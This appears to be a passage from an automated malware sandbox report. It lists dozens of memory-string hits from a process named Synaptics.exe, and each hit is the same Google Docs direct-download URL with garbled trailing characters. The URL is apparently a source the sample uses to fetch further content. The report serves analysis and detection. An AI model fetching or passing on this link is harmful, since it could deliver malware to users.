                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj7
                              Source: Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj=
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjL
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjS
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjv
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkM
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkS
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkTA
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkU
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadke
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkw~
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl.
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlC
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadli
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadliD
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem6
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlq
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlunaq
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm/ima
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmP
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmV
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadma=25
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmana
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmgp
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.H
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.P
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn0
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnL
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnM
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnT
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadname
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncel
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetl
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniverAWo
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyo
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor0-
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnl
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado-
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoadSe
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadody
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogt
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonten
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogl
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadop
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpA
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpC
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpeat
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps4
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpuA
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqR
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqb
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqwT
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr3
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrUx
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrV
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadreT
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrf
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrl(//
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads-cn.
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads2
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsR
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadscale
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstF
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1-cneVK
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtB
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadta
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtp
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduU
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadue
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadufX
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduwD
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv7
                              Source: Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv=
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvL
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvS
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi8
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvideo
